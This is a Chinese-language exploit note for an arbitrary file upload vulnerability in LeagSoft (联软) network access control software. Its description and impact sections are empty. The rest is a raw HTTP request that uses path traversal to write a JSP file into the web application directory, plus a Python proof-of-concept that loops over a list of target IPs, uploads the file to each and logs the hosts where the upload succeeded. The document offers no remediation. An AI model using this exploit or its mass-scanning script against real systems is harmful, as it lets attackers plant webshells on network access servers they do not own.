联软准入 任意文件上传漏洞.md
2.16 KB / 2021-04-21 09:23:46
联软准入 任意文件上传漏洞
=========================
一、漏洞简介
------------
二、漏洞影响
------------
三、复现过程
------------
POST /uai/download/uploadfileToPath.htm HTTP/1.1
Host: www.0-sec.org:8099
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 308
Content-Type: multipart/form-data; boundary=ea8ef2c3b016cd152a651d2799ef2c5c
--ea8ef2c3b016cd152a651d2799ef2c5c
Content-Disposition: form-data; name="input_localfile"; filename="111.jsp"
Content-Type: text/plain
aaaaa
--ea8ef2c3b016cd152a651d2799ef2c5c
Content-Disposition: form-data; name="uploadpath";
../webapps/notifymsg/devreport/
--ea8ef2c3b016cd152a651d2799ef2c5c--
上传路径:
`https://www.0-sec.org/notifymsg/devreport/111.jsp`
### poc
> poc.py
import requests
def main(line):
proxies = {'http': 'http://localhost:8080'}
# url = 'https://www.0-sec.org/uai/download/uploadfileToPath.htm'
url = line + '/uai/download/uploadfileToPath.htm'
url_2 = line.strip() + '/notifymsg/devreport/{}'
filename = '111.txt'
files = {
'input_localfile': (filename, open(filename), 'text/plain'),
}
content = {
'uploadpath': '../webapps/notifymsg/devreport/'
}
res = requests.post(url, files=files, proxies=proxies, data=content, verify=False)
# print(res.text)
res_2 = requests.get(url_2.format(filename), verify=False)
if 'xxx' in res_2.text:
print('ok....')
with open('ok.txt', mode='a') as f:
f.write(url_2.format(filename) + '\n')
print('写入成功...')
if __name__ == '__main__':
with open('ip.txt', mode='r') as f:
for line in f.readlines():
if line == '\n':
pass
main(line)
参考链接
--------
> https://blog.csdn.net/m0\_48520508/article/details/108790281